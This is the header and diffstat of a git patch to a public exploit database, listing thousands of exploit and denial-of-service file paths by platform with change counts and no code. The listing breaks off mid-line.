From d63de06c7a2fcd81344a371b03e6916c850d80e1 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Thu, 10 Nov 2022 16:39:50 +0000 Subject: [PATCH] DB: 2022-11-10 2776 changes to exploits/shellcodes/ghdb --- exploits/aix/local/45938.pl | 3 +- exploits/android/dos/38555.txt | 2 +- exploits/android/dos/38557.txt | 2 +- exploits/android/dos/38610.txt | 2 +- exploits/android/dos/38611.txt | 2 +- exploits/android/dos/38612.txt | 2 +- exploits/android/dos/38613.txt | 2 +- exploits/android/dos/38614.txt | 2 +- exploits/android/dos/39424.txt | 2 +- exploits/android/dos/39425.txt | 2 +- exploits/android/dos/39629.txt | 2 +- exploits/android/dos/39651.txt | 2 +- exploits/android/dos/39685.txt | 2 +- exploits/android/dos/39686.txt | 2 +- exploits/android/dos/39921.txt | 2 +- exploits/android/dos/40381.txt | 2 +- exploits/android/dos/40449.txt | 2 +- exploits/android/dos/40515.txt | 2 +- exploits/android/dos/40876.txt | 2 +- exploits/android/dos/40945.txt | 2 +- exploits/android/dos/40993.txt | 2 +- exploits/android/dos/41161.txt | 2 +- exploits/android/dos/41211.txt | 2 +- exploits/android/dos/41212.txt | 2 +- exploits/android/dos/41218.txt | 2 +- exploits/android/dos/41232.txt | 2 +- exploits/android/dos/41351.txt | 2 +- exploits/android/dos/41352.txt | 2 +- exploits/android/dos/41353.txt | 2 +- exploits/android/dos/41354.txt | 2 +- exploits/android/dos/41355.txt | 2 +- exploits/android/dos/41981.txt | 2 +- exploits/android/dos/41982.txt | 2 +- exploits/android/dos/41983.txt | 2 +- exploits/android/dos/42169.txt | 2 +- exploits/android/dos/42170.txt | 2 +- exploits/android/dos/42171.txt | 2 +- exploits/android/dos/42285.txt | 2 +- exploits/android/dos/43464.txt | 2 +- exploits/android/dos/43513.txt | 2 +- exploits/android/dos/43996.txt | 2 +- exploits/android/dos/44268.txt | 2 +- exploits/android/dos/44724.txt | 2 +- exploits/android/dos/45558.txt | 2 +- exploits/android/dos/45579.txt | 2 +- exploits/android/dos/46356.txt | 2 +- exploits/android/dos/46357.txt | 2 +- exploits/android/dos/46503.txt | 2 +- exploits/android/dos/46504.txt | 2 +- exploits/android/dos/46853.txt | 2 +- exploits/android/dos/46941.txt | 2 +- exploits/android/dos/47119.txt | 2 +- exploits/android/dos/47920.txt | 2 +- exploits/android/local/39757.txt | 2 +- exploits/android/local/40066.txt | 2 +- exploits/android/local/41130.txt | 2 +- exploits/android/local/41217.txt | 2 +- exploits/android/local/42601.txt | 2 +- exploits/android/local/45192.txt | 2 +- exploits/android/local/45379.txt | 2 +- exploits/android/local/47463.txt | 2 +- exploits/android/local/9477.txt | 2 +- exploits/android/remote/39640.txt | 2 +- exploits/android/remote/40354.txt | 2 +- exploits/android/remote/40874.txt | 2 +- exploits/arm/dos/40182.txt | 2 +- exploits/asp/remote/15213.pl | 2 +- exploits/asp/webapps/14192.txt | 2 +- exploits/asp/webapps/14821.txt | 2 +- exploits/asp/webapps/14898.txt | 2 +- exploits/asp/webapps/14954.txt | 2 +- exploits/asp/webapps/14969.txt | 2 +- exploits/asp/webapps/14991.txt | 2 +- exploits/asp/webapps/14999.txt | 2 +- exploits/asp/webapps/15058.html | 2 +- exploits/asp/webapps/15067.txt | 2 +- exploits/asp/webapps/15078.txt | 2 +- exploits/asp/webapps/15106.txt | 2 +- exploits/asp/webapps/15124.txt | 2 +- exploits/asp/webapps/15160.txt | 2 +- exploits/asp/webapps/15703.txt | 4 +- exploits/asp/webapps/16241.txt | 3 +- exploits/asp/webapps/32660.txt | 5 +- exploits/asp/webapps/42776.txt | 2 +- exploits/asp/webapps/42792.txt | 2 +- exploits/asp/webapps/8719.py | 2 +- exploits/aspx/webapps/47793.txt | 2 +- exploits/beos/local/19840.txt | 2 +- exploits/bsd/dos/19488.c | 5 +- exploits/bsd/local/19411.txt | 2 +- exploits/bsd/local/23655.txt | 2 +- exploits/bsd/remote/19520.txt | 2 +- exploits/cfm/webapps/15120.txt | 3 +- exploits/cfm/webapps/16225.txt | 4 +- exploits/cgi/webapps/22169.pl | 2 +- exploits/cgi/webapps/28321.pl | 2 +- exploits/cgi/webapps/29844.txt | 5 +- exploits/cgi/webapps/39871.txt | 3 +- exploits/cgi/webapps/40272.txt | 2 +- exploits/cgi/webapps/40273.txt | 2 +- exploits/cgi/webapps/40274.txt | 2 +- exploits/cgi/webapps/40303.sh | 2 +- exploits/cgi/webapps/40304.txt | 2 +- exploits/freebsd/local/12090.txt | 2 +- exploits/freebsd/local/12091.txt | 2 +- exploits/freebsd/remote/17462.txt | 2 +- exploits/freebsd/remote/18181.txt | 2 +- exploits/freebsd/remote/20593.txt | 2 +- exploits/freebsd/webapps/12658.txt | 2 +- exploits/freebsd/webapps/24439.txt | 2 +- exploits/hardware/dos/11043.txt | 2 +- exploits/hardware/dos/11880.txt | 2 +- exploits/hardware/dos/12093.txt | 2 +- exploits/hardware/dos/13823.txt | 2 +- exploits/hardware/dos/13824.txt | 2 +- exploits/hardware/dos/13825.txt | 2 +- exploits/hardware/dos/18751.txt | 2 +- exploits/hardware/dos/20821.txt | 2 +- exploits/hardware/dos/20824.txt | 2 +- exploits/hardware/dos/21092.txt | 2 +- exploits/hardware/dos/22596.txt | 2 +- exploits/hardware/dos/22978.txt | 2 +- exploits/hardware/dos/23876.txt | 2 +- exploits/hardware/dos/23900.txt | 2 +- exploits/hardware/dos/28228.txt | 2 +- exploits/hardware/dos/41806.txt | 2 +- exploits/hardware/dos/43119.py | 2 +- exploits/hardware/dos/43490.txt | 2 +- exploits/hardware/dos/44197.md | 2 +- exploits/hardware/dos/8013.txt | 2 +- exploits/hardware/local/21001.txt | 2 +- exploits/hardware/local/40271.txt | 2 +- exploits/hardware/local/43397.md | 2 +- exploits/hardware/local/44198.md | 2 +- exploits/hardware/local/44200.md | 2 +- exploits/hardware/local/44644.txt | 2 +- exploits/hardware/local/44818.md | 2 +- exploits/hardware/local/44820.txt | 2 +- exploits/hardware/local/45785.md | 2 +- exploits/hardware/local/46522.md | 2 +- exploits/hardware/remote/12298.txt | 2 +- exploits/hardware/remote/18291.txt | 2 +- exploits/hardware/remote/19538.txt | 6 +- exploits/hardware/remote/2034.txt | 2 +- exploits/hardware/remote/22532.txt | 2 +- exploits/hardware/remote/23212.txt | 2 +- exploits/hardware/remote/28056.txt | 2 +- exploits/hardware/remote/31132.txt | 2 +- exploits/hardware/remote/33869.txt | 2 +- exploits/hardware/remote/34465.txt | 2 +- exploits/hardware/remote/39314.c | 2 +- exploits/hardware/remote/39823.py | 3 +- exploits/hardware/remote/40258.txt | 2 +- exploits/hardware/remote/40275.txt | 2 +- exploits/hardware/remote/41298.txt | 2 +- exploits/hardware/remote/41805.txt | 2 +- exploits/hardware/remote/41808.txt | 2 +- exploits/hardware/remote/42726.py | 2 +- exploits/hardware/remote/42787.txt | 2 +- exploits/hardware/remote/42888.sh | 2 +- exploits/hardware/remote/43061.txt | 2 +- exploits/hardware/remote/43105.txt | 4 +- exploits/hardware/remote/43118.txt | 2 +- exploits/hardware/remote/44196.md | 2 +- exploits/hardware/remote/44574.txt | 2 +- exploits/hardware/remote/44635.py | 2 +- exploits/hardware/remote/46444.txt | 2 +- exploits/hardware/remote/47936.js | 2 +- exploits/hardware/remote/50351.txt | 8 +- exploits/hardware/remote/8269.txt | 2 +- exploits/hardware/webapps/11101.txt | 2 +- exploits/hardware/webapps/12092.txt | 2 +- exploits/hardware/webapps/29959.txt | 2 +- exploits/hardware/webapps/31088.py | 5 +- exploits/hardware/webapps/32237.txt | 3 +- exploits/hardware/webapps/32883.txt | 8 +- exploits/hardware/webapps/33138.txt | 3 +- exploits/hardware/webapps/34254.txt | 2 +- exploits/hardware/webapps/35933.txt | 3 +- exploits/hardware/webapps/38004.txt | 4 +- exploits/hardware/webapps/38369.txt | 2 +- exploits/hardware/webapps/38514.py | 2 +- exploits/hardware/webapps/39716.py | 2 +- exploits/hardware/webapps/40276.txt | 2 +- exploits/hardware/webapps/40690.txt | 2 +- exploits/hardware/webapps/41829.txt | 2 +- exploits/hardware/webapps/42547.py | 2 +- exploits/hardware/webapps/42588.txt | 2 +- exploits/hardware/webapps/42608.txt | 2 +- exploits/hardware/webapps/42633.txt | 2 +- exploits/hardware/webapps/42634.txt | 2 +- exploits/hardware/webapps/42649.txt | 2 +- exploits/hardware/webapps/42732.py | 2 +- exploits/hardware/webapps/42785.sh | 2 +- exploits/hardware/webapps/42786.txt | 2 +- exploits/hardware/webapps/42788.txt | 2 +- exploits/hardware/webapps/42789.txt | 2 +- exploits/hardware/webapps/42916.py | 2 +- exploits/hardware/webapps/42931.txt | 2 +- exploits/hardware/webapps/42947.txt | 2 +- exploits/hardware/webapps/42986.txt | 5 +- exploits/hardware/webapps/44864.py | 2 +- exploits/hardware/webapps/45526.txt | 2 +- exploits/hardware/webapps/46263.txt | 2 +- exploits/hardware/webapps/47893.js | 2 +- exploits/hardware/webapps/48588.py | 2 +- exploits/ios/dos/39359.txt | 2 +- exploits/ios/dos/39360.txt | 2 +- exploits/ios/dos/39361.txt | 2 +- exploits/ios/dos/39362.txt | 2 +- exploits/ios/dos/39363.txt | 2 +- exploits/ios/dos/39364.txt | 2 +- exploits/ios/dos/40906.txt | 2 +- exploits/ios/dos/42014.txt | 2 +- exploits/ios/dos/45649.txt | 2 +- exploits/ios/dos/45786.txt | 2 +- exploits/ios/dos/46913.txt | 2 +- exploits/ios/dos/47415.txt | 2 +- exploits/ios/dos/47694.txt | 2 +- exploits/ios/local/14538.txt | 2 +- exploits/ios/local/42555.txt | 2 +- exploits/ios/remote/28081.txt | 2 +- exploits/ios/remote/34399.txt | 24 +- exploits/ios/remote/42784.txt | 2 +- exploits/ios/remote/42996.txt | 2 +- exploits/ios/remote/4522.html | 2 +- exploits/irix/local/19210.txt | 2 +- exploits/irix/local/19280.txt | 5 +- exploits/irix/local/19353.txt | 5 +- exploits/java/dos/41965.txt | 2 +- exploits/java/dos/46409.txt | 2 +- exploits/java/dos/46410.txt | 2 +- exploits/java/dos/46411.txt | 2 +- exploits/java/dos/46412.txt | 2 +- exploits/java/remote/30502.txt | 2 +- exploits/java/remote/39007.txt | 2 +- exploits/java/remote/39854.txt | 2 +- exploits/java/remote/42701.rb | 2 +- exploits/java/remote/42702.rb | 2 +- exploits/java/remote/42756.py | 2 +- exploits/java/webapps/40817.txt | 2 +- exploits/java/webapps/40842.txt | 4 +- exploits/java/webapps/42543.txt | 2 +- exploits/java/webapps/42544.py | 2 +- exploits/java/webapps/43114.py | 2 +- exploits/json/webapps/42579.txt | 3 +- exploits/json/webapps/42580.html | 2 +- exploits/jsp/remote/18179.html | 6 +- exploits/jsp/remote/42698.rb | 2 +- exploits/jsp/webapps/15997.py | 2 +- exploits/jsp/webapps/17503.pl | 5 +- exploits/jsp/webapps/35910.txt | 3 +- exploits/jsp/webapps/41577.txt | 2 +- exploits/linux/dos/10203.txt | 2 +- exploits/linux/dos/10206.txt | 4 +- exploits/linux/dos/14573.txt | 2 +- exploits/linux/dos/15062.txt | 6 +- exploits/linux/dos/18295.txt | 2 +- exploits/linux/dos/18579.txt | 2 +- exploits/linux/dos/2051.py | 2 +- exploits/linux/dos/21122.sh | 4 +- exploits/linux/dos/23076.pl | 3 +- exploits/linux/dos/23427.txt | 2 +- exploits/linux/dos/23757.txt | 2 +- exploits/linux/dos/23946.c | 2 +- exploits/linux/dos/24815.txt | 2 +- exploits/linux/dos/24865.txt | 2 +- exploits/linux/dos/27762.txt | 6 +- exploits/linux/dos/27764.txt | 2 +- exploits/linux/dos/27765.txt | 2 +- exploits/linux/dos/27925.txt | 2 +- exploits/linux/dos/28348.txt | 2 +- exploits/linux/dos/28358.txt | 2 +- exploits/linux/dos/28367.txt | 2 +- exploits/linux/dos/28380.txt | 2 +- exploits/linux/dos/28383.txt | 2 +- exploits/linux/dos/28384.txt | 2 +- exploits/linux/dos/28895.txt | 2 +- exploits/linux/dos/28912.txt | 2 +- exploits/linux/dos/29399.txt | 2 +- exploits/linux/dos/29520.txt | 2 +- exploits/linux/dos/29723.txt | 2 +- exploits/linux/dos/29809.txt | 2 +- exploits/linux/dos/30024.txt | 2 +- exploits/linux/dos/30648.txt | 2 +- exploits/linux/dos/30776.txt | 2 +- exploits/linux/dos/30837.txt | 2 +- exploits/linux/dos/30894.txt | 2 +- exploits/linux/dos/31018.txt | 8 +- exploits/linux/dos/31054.txt | 2 +- exploits/linux/dos/31218.txt | 2 +- exploits/linux/dos/31552.txt | 2 +- exploits/linux/dos/31553.txt | 2 +- exploits/linux/dos/31554.txt | 2 +- exploits/linux/dos/31984.txt | 2 +- exploits/linux/dos/32018.txt | 2 +- exploits/linux/dos/32019.txt | 2 +- exploits/linux/dos/32452.txt | 2 +- exploits/linux/dos/32740.txt | 2 +- exploits/linux/dos/32775.txt | 2 +- exploits/linux/dos/32800.txt | 2 +- exploits/linux/dos/32856.txt | 2 +- exploits/linux/dos/32857.txt | 2 +- exploits/linux/dos/33017.txt | 2 +- exploits/linux/dos/33049.txt | 2 +- exploits/linux/dos/33088.txt | 4 +- exploits/linux/dos/33101.txt | 2 +- exploits/linux/dos/33134.txt | 2 +- exploits/linux/dos/33222.txt | 2 +- exploits/linux/dos/33223.txt | 2 +- exploits/linux/dos/33224.txt | 2 +- exploits/linux/dos/33228.txt | 2 +- exploits/linux/dos/33233.txt | 4 +- exploits/linux/dos/33283.txt | 2 +- exploits/linux/dos/33524.txt | 2 +- exploits/linux/dos/33549.txt | 2 +- exploits/linux/dos/34228.txt | 2 +- exploits/linux/dos/34249.txt | 2 +- exploits/linux/dos/34278.txt | 2 +- exploits/linux/dos/34279.txt | 2 +- exploits/linux/dos/34427.txt | 2 +- exploits/linux/dos/34953.txt | 2 +- exploits/linux/dos/35081.txt | 2 +- exploits/linux/dos/35173.txt | 2 +- exploits/linux/dos/35432.txt | 2 +- exploits/linux/dos/36633.txt | 2 +- exploits/linux/dos/36669.txt | 2 +- exploits/linux/dos/37839.txt | 2 +- exploits/linux/dos/37866.txt | 2 +- exploits/linux/dos/37867.txt | 2 +- exploits/linux/dos/37869.txt | 2 +- exploits/linux/dos/37870.txt | 2 +- exploits/linux/dos/38620.txt | 2 +- exploits/linux/dos/38778.txt | 2 +- exploits/linux/dos/39229.cpp | 2 +- exploits/linux/dos/39454.txt | 2 +- exploits/linux/dos/39491.txt | 2 +- exploits/linux/dos/39492.txt | 2 +- exploits/linux/dos/39493.txt | 2 +- exploits/linux/dos/39494.txt | 2 +- exploits/linux/dos/39545.txt | 2 +- exploits/linux/dos/39638.txt | 2 +- exploits/linux/dos/39733.py | 2 +- exploits/linux/dos/39773.txt | 2 +- exploits/linux/dos/39940.txt | 2 +- exploits/linux/dos/39941.txt | 2 +- exploits/linux/dos/39942.txt | 2 +- exploits/linux/dos/39943.txt | 2 +- exploits/linux/dos/39944.txt | 2 +- exploits/linux/dos/39961.txt | 2 +- exploits/linux/dos/40291.txt | 2 +- exploits/linux/dos/41715.txt | 7 +- exploits/linux/dos/42138.txt | 2 +- exploits/linux/dos/42139.txt | 2 +- exploits/linux/dos/42147.txt | 2 +- exploits/linux/dos/42148.txt | 2 +- exploits/linux/dos/42162.txt | 2 +- exploits/linux/dos/42198.txt | 2 +- exploits/linux/dos/42199.txt | 2 +- exploits/linux/dos/42200.txt | 2 +- exploits/linux/dos/42201.txt | 2 +- exploits/linux/dos/42202.txt | 2 +- exploits/linux/dos/42203.txt | 2 +- exploits/linux/dos/42204.txt | 2 +- exploits/linux/dos/42207.txt | 2 +- exploits/linux/dos/42258.txt | 2 +- exploits/linux/dos/42259.txt | 2 +- exploits/linux/dos/42299.txt | 2 +- exploits/linux/dos/42300.txt | 2 +- exploits/linux/dos/42301.txt | 2 +- exploits/linux/dos/42386.txt | 2 +- exploits/linux/dos/42389.txt | 2 +- exploits/linux/dos/42390.txt | 2 +- exploits/linux/dos/42391.txt | 2 +- exploits/linux/dos/42396.txt | 2 +- exploits/linux/dos/42397.txt | 2 +- exploits/linux/dos/42398.txt | 2 +- exploits/linux/dos/42399.txt | 2 +- exploits/linux/dos/42400.txt | 2 +- exploits/linux/dos/42409.txt | 2 +- exploits/linux/dos/42433.txt | 2 +- exploits/linux/dos/42546.txt | 2 +- exploits/linux/dos/42600.txt | 2 +- exploits/linux/dos/42652.txt | 2 +- exploits/linux/dos/42762.txt | 2 +- exploits/linux/dos/42970.txt | 4 +- exploits/linux/dos/43014.txt | 2 +- exploits/linux/dos/43322.txt | 2 +- exploits/linux/dos/44254.py | 2 +- exploits/linux/dos/44265.py | 2 +- exploits/linux/dos/44490.txt | 2 +- exploits/linux/dos/44519.txt | 2 +- exploits/linux/dos/45268.txt | 2 +- exploits/linux/dos/46626.txt | 2 +- exploits/linux/dos/47178.txt | 2 +- exploits/linux/dos/48301.py | 2 +- exploits/linux/local/10313.c | 2 +- exploits/linux/local/1596.txt | 2 +- exploits/linux/local/1831.txt | 2 +- exploits/linux/local/19803.txt | 2 +- exploits/linux/local/19813.txt | 2 +- exploits/linux/local/19915.txt | 2 +- exploits/linux/local/2031.c | 2 +- exploits/linux/local/20843.txt | 2 +- exploits/linux/local/20926.txt | 2 +- exploits/linux/local/21062.txt | 2 +- exploits/linux/local/21063.txt | 2 +- exploits/linux/local/21124.txt | 2 +- exploits/linux/local/21229.txt | 2 +- exploits/linux/local/21248.txt | 2 +- exploits/linux/local/21375.txt | 2 +- exploits/linux/local/21458.txt | 2 +- exploits/linux/local/21763.txt | 2 +- exploits/linux/local/22189.txt | 2 +- exploits/linux/local/22190.txt | 2 +- exploits/linux/local/22458.c | 2 +- exploits/linux/local/23351.c | 2 +- exploits/linux/local/25707.txt | 2 +- exploits/linux/local/29714.txt | 2 +- exploits/linux/local/30605.c | 69 --- exploits/linux/local/31911.txt | 6 +- exploits/linux/local/33395.txt | 2 +- exploits/linux/local/34421.c | 2 +- exploits/linux/local/34537.txt | 2 +- exploits/linux/local/35749.txt | 2 +- exploits/linux/local/37168.txt | 2 +- exploits/linux/local/3730.txt | 2 +- exploits/linux/local/38353.txt | 2 +- exploits/linux/local/39771.txt | 2 +- exploits/linux/local/39772.txt | 2 +- exploits/linux/local/39992.md | 2 +- exploits/linux/local/40270.txt | 2 +- exploits/linux/local/40489.txt | 2 +- exploits/linux/local/40936.html | 2 +- exploits/linux/local/40937.txt | 2 +- exploits/linux/local/40943.txt | 4 +- exploits/linux/local/40962.txt | 2 +- exploits/linux/local/41356.txt | 2 +- exploits/linux/local/41597.txt | 2 +- exploits/linux/local/41973.txt | 2 +- exploits/linux/local/42611.txt | 2 +- exploits/linux/local/43006.txt | 2 +- exploits/linux/local/43007.txt | 2 +- exploits/linux/local/43127.c | 2 +- exploits/linux/local/44204.md | 2 +- exploits/linux/local/44205.md | 2 +- exploits/linux/local/45372.txt | 2 +- exploits/linux/local/45407.txt | 2 +- exploits/linux/local/45497.txt | 2 +- exploits/linux/local/45573.txt | 2 +- exploits/linux/local/45631.md | 2 +- exploits/linux/local/45886.txt | 2 +- exploits/linux/local/46359.md | 2 +- exploits/linux/local/46361.py | 2 +- exploits/linux/local/46362.py | 2 +- exploits/linux/local/46369.md | 2 +- exploits/linux/local/47133.txt | 2 +- exploits/linux/local/47164.sh | 2 +- exploits/linux/local/47165.sh | 2 +- exploits/linux/local/47166.sh | 2 +- exploits/linux/local/47167.sh | 2 +- exploits/linux/local/7855.txt | 2 +- exploits/linux/local/7856.txt | 2 +- exploits/linux/local/9191.txt | 2 +- exploits/linux/local/9208.txt | 2 +- exploits/linux/local/9435.txt | 2 +- exploits/linux/local/9436.txt | 2 +- exploits/linux/local/9574.txt | 2 +- exploits/linux/local/9598.txt | 2 +- exploits/linux/local/9627.txt | 2 +- exploits/linux/local/9641.txt | 2 +- exploits/linux/remote/10610.rb | 2 +- exploits/linux/remote/18145.py | 4 +- exploits/linux/remote/19522.txt | 2 +- exploits/linux/remote/19892.txt | 2 +- exploits/linux/remote/20924.txt | 2 +- exploits/linux/remote/21210.txt | 2 +- exploits/linux/remote/21402.txt | 2 +- exploits/linux/remote/22147.c | 2 +- exploits/linux/remote/22187.txt | 2 +- exploits/linux/remote/22264.txt | 2 +- exploits/linux/remote/22584.txt | 2 +- exploits/linux/remote/23082.txt | 2 +- exploits/linux/remote/23728.txt | 10 +- exploits/linux/remote/23881.txt | 2 +- exploits/linux/remote/24784.txt | 2 +- exploits/linux/remote/24848.txt | 2 +- exploits/linux/remote/24852.txt | 2 +- exploits/linux/remote/24977.txt | 2 +- exploits/linux/remote/24978.txt | 2 +- exploits/linux/remote/25005.txt | 2 +- exploits/linux/remote/25006.txt | 2 +- exploits/linux/remote/25008.txt | 2 +- exploits/linux/remote/25010.txt | 2 +- exploits/linux/remote/25015.txt | 2 +- exploits/linux/remote/25030.txt | 2 +- exploits/linux/remote/25035.txt | 2 +- exploits/linux/remote/25036.txt | 2 +- exploits/linux/remote/25150.txt | 2 +- exploits/linux/remote/26540.txt | 2 +- exploits/linux/remote/29160.c | 2 +- exploits/linux/remote/29471.txt | 2 +- exploits/linux/remote/29768.txt | 2 +- exploits/linux/remote/29769.txt | 2 +- exploits/linux/remote/29770.txt | 2 +- exploits/linux/remote/30043.txt | 2 +- exploits/linux/remote/30089.txt | 2 +- exploits/linux/remote/30142.txt | 2 +- exploits/linux/remote/3021.txt | 2 +- exploits/linux/remote/30291.txt | 2 +- exploits/linux/remote/30543.txt | 2 +- exploits/linux/remote/30728.txt | 2 +- exploits/linux/remote/30907.txt | 2 +- exploits/linux/remote/30971.txt | 2 +- exploits/linux/remote/31076.py | 3 +- exploits/linux/remote/31591.txt | 2 +- exploits/linux/remote/31630.txt | 2 +- exploits/linux/remote/32012.txt | 2 +- exploits/linux/remote/32133.txt | 2 +- exploits/linux/remote/32225.txt | 2 +- exploits/linux/remote/32691.txt | 2 +- exploits/linux/remote/32965.c | 3 +- exploits/linux/remote/33032.txt | 2 +- exploits/linux/remote/33313.txt | 2 +- exploits/linux/remote/34192.txt | 2 +- exploits/linux/remote/34358.txt | 2 +- exploits/linux/remote/35232.txt | 2 +- exploits/linux/remote/35314.txt | 2 +- exploits/linux/remote/39736.txt | 2 +- exploits/linux/remote/40916.txt | 2 +- exploits/linux/remote/41910.sh | 3 +- exploits/linux/remote/42695.rb | 2 +- exploits/linux/remote/42697.rb | 3 +- exploits/linux/remote/42709.rb | 3 +- exploits/linux/remote/42790.txt | 2 +- exploits/linux/remote/42949.txt | 2 +- exploits/linux/remote/42957.py | 2 +- exploits/linux/remote/42958.py | 2 +- exploits/linux/remote/43360.py | 2 +- exploits/linux/remote/46242.txt | 2 +- exploits/linux/remote/5386.txt | 2 +- exploits/linux/remote/5622.txt | 2 +- exploits/linux/remote/5632.rb | 4 +- exploits/linux/remote/5720.py | 2 +- exploits/linux/remote/609.txt | 2 +- exploits/linux/remote/7701.txt | 2 +- exploits/linux/webapps/30085.txt | 2 +- exploits/linux/webapps/42769.rb | 2 +- exploits/linux/webapps/42975.txt | 2 +- exploits/linux/webapps/42991.txt | 2 +- exploits/linux/webapps/48642.sh | 2 +- exploits/linux_x86-64/dos/33585.txt | 2 +- exploits/linux_x86-64/dos/37868.txt | 2 +- exploits/linux_x86-64/dos/37876.txt | 2 +- exploits/linux_x86-64/dos/37879.txt | 2 +- exploits/linux_x86-64/dos/37880.txt | 2 +- exploits/linux_x86-64/local/35472.txt | 2 +- exploits/linux_x86-64/local/36310.txt | 2 +- exploits/linux_x86-64/local/36311.txt | 2 +- exploits/linux_x86-64/local/40049.c | 2 +- exploits/linux_x86-64/local/44300.c | 2 +- exploits/linux_x86-64/remote/32277.txt | 2 +- exploits/linux_x86/dos/38763.txt | 2 +- exploits/linux_x86/remote/20032.txt | 2 +- exploits/macos/dos/40954.c | 2 +- exploits/macos/dos/42046.txt | 2 +- exploits/macos/dos/42047.txt | 2 +- exploits/macos/dos/43415.txt | 2 +- exploits/macos/dos/44235.c | 2 +- exploits/macos/dos/44236.c | 2 +- exploits/macos/dos/44561.txt | 2 +- exploits/macos/dos/45787.txt | 2 +- exploits/macos/dos/45788.txt | 2 +- exploits/macos/dos/46433.txt | 2 +- exploits/macos/dos/46478.txt | 2 +- exploits/macos/dos/47207.txt | 2 +- exploits/macos/dos/47479.txt | 2 +- exploits/macos/dos/47791.txt | 2 +- exploits/macos/local/40669.txt | 2 +- exploits/macos/local/40956.c | 2 +- exploits/macos/local/40957.c | 2 +- exploits/macos/local/44234.c | 2 +- exploits/macos/local/44237.md | 2 +- exploits/macos/local/46428.m | 2 +- exploits/macos/local/47400.md | 2 +- exploits/macos/local/47708.txt | 2 +- exploits/macos/remote/42125.txt | 2 +- exploits/multiple/dos/10205.txt | 2 +- exploits/multiple/dos/10327.txt | 2 +- exploits/multiple/dos/11142.txt | 2 +- exploits/multiple/dos/14268.txt | 2 +- exploits/multiple/dos/14761.txt | 2 +- exploits/multiple/dos/15086.py | 2 +- exploits/multiple/dos/15215.txt | 2 +- exploits/multiple/dos/15261.txt | 2 +- exploits/multiple/dos/15676.txt | 2 +- exploits/multiple/dos/15707.txt | 2 +- exploits/multiple/dos/15973.txt | 2 +- exploits/multiple/dos/16261.txt | 2 +- exploits/multiple/dos/1709.txt | 2 +- exploits/multiple/dos/17201.php | 2 +- exploits/multiple/dos/1801.txt | 2 +- exploits/multiple/dos/1820.txt | 2 +- exploits/multiple/dos/18600.txt | 2 +- exploits/multiple/dos/18601.txt | 2 +- exploits/multiple/dos/18758.txt | 2 +- exploits/multiple/dos/18877.txt | 2 +- exploits/multiple/dos/18890.txt | 4 +- exploits/multiple/dos/18918.txt | 2 +- exploits/multiple/dos/18919.txt | 16 +- exploits/multiple/dos/18920.txt | 2 +- exploits/multiple/dos/19380.txt | 2 +- exploits/multiple/dos/19482.txt | 2 +- exploits/multiple/dos/19780.txt | 6 +- exploits/multiple/dos/20052.txt | 2 +- exploits/multiple/dos/20098.txt | 2 +- exploits/multiple/dos/20558.txt | 2 +- exploits/multiple/dos/21572.txt | 2 +- exploits/multiple/dos/21593.txt | 2 +- exploits/multiple/dos/23231.txt | 2 +- exploits/multiple/dos/23556.txt | 2 +- exploits/multiple/dos/23641.txt | 2 +- exploits/multiple/dos/23642.txt | 2 +- exploits/multiple/dos/23755.txt | 2 +- exploits/multiple/dos/23805.txt | 4 +- exploits/multiple/dos/23902.txt | 2 +- exploits/multiple/dos/23904.txt | 2 +- exploits/multiple/dos/24170.txt | 2 +- exploits/multiple/dos/24486.txt | 2 +- exploits/multiple/dos/24668.txt | 2 +- exploits/multiple/dos/24691.txt | 2 +- exploits/multiple/dos/24761.txt | 2 +- exploits/multiple/dos/24793.txt | 2 +- exploits/multiple/dos/24807.txt | 2 +- exploits/multiple/dos/24818.txt | 2 +- exploits/multiple/dos/25081.txt | 2 +- exploits/multiple/dos/25171.txt | 2 +- exploits/multiple/dos/25387.txt | 2 +- exploits/multiple/dos/25388.txt | 2 +- exploits/multiple/dos/25389.txt | 2 +- exploits/multiple/dos/25584.txt | 2 +- exploits/multiple/dos/25692.txt | 2 +- exploits/multiple/dos/25757.txt | 2 +- exploits/multiple/dos/25791.txt | 2 +- exploits/multiple/dos/2587.txt | 2 +- exploits/multiple/dos/27108.txt | 2 +- exploits/multiple/dos/27140.txt | 2 +- exploits/multiple/dos/27365.txt | 2 +- exploits/multiple/dos/27547.txt | 2 +- exploits/multiple/dos/27993.txt | 2 +- exploits/multiple/dos/28345.txt | 2 +- exploits/multiple/dos/28666.txt | 2 +- exploits/multiple/dos/2910.txt | 2 +- exploits/multiple/dos/2911.txt | 2 +- exploits/multiple/dos/2912.txt | 2 +- exploits/multiple/dos/30139.c | 2 +- exploits/multiple/dos/30498.txt | 2 +- exploits/multiple/dos/30513.txt | 4 +- exploits/multiple/dos/30519.txt | 2 +- exploits/multiple/dos/30524.txt | 2 +- exploits/multiple/dos/30529.txt | 2 +- exploits/multiple/dos/30540.txt | 2 +- exploits/multiple/dos/30566.txt | 2 +- exploits/multiple/dos/30574.txt | 2 +- exploits/multiple/dos/30779.txt | 2 +- exploits/multiple/dos/30791.txt | 2 +- exploits/multiple/dos/30856.txt | 2 +- exploits/multiple/dos/30943.txt | 2 +- exploits/multiple/dos/30989.txt | 2 +- exploits/multiple/dos/30990.txt | 4 +- exploits/multiple/dos/30991.txt | 2 +- exploits/multiple/dos/31136.txt | 2 +- exploits/multiple/dos/31148.txt | 2 +- exploits/multiple/dos/31150.txt | 2 +- exploits/multiple/dos/31232.txt | 2 +- exploits/multiple/dos/31271.txt | 2 +- exploits/multiple/dos/31285.txt | 2 +- exploits/multiple/dos/31327.txt | 4 +- exploits/multiple/dos/31343.txt | 2 +- exploits/multiple/dos/31542.txt | 2 +- exploits/multiple/dos/31728.txt | 4 +- exploits/multiple/dos/31932.txt | 2 +- exploits/multiple/dos/31957.txt | 2 +- exploits/multiple/dos/31958.txt | 2 +- exploits/multiple/dos/31998.txt | 2 +- exploits/multiple/dos/32006.txt | 6 +- exploits/multiple/dos/32104.txt | 2 +- exploits/multiple/dos/32125.txt | 2 +- exploits/multiple/dos/32127.txt | 2 +- exploits/multiple/dos/32192.txt | 4 +- exploits/multiple/dos/32362.txt | 2 +- exploits/multiple/dos/32386.txt | 2 +- exploits/multiple/dos/33080.txt | 2 +- exploits/multiple/dos/33083.txt | 2 +- exploits/multiple/dos/33099.txt | 2 +- exploits/multiple/dos/33100.txt | 2 +- exploits/multiple/dos/33104.txt | 2 +- exploits/multiple/dos/33105.txt | 2 +- exploits/multiple/dos/33182.txt | 4 +- exploits/multiple/dos/33735.txt | 2 +- exploits/multiple/dos/34270.txt | 2 +- exploits/multiple/dos/34340.txt | 2 +- exploits/multiple/dos/34360.txt | 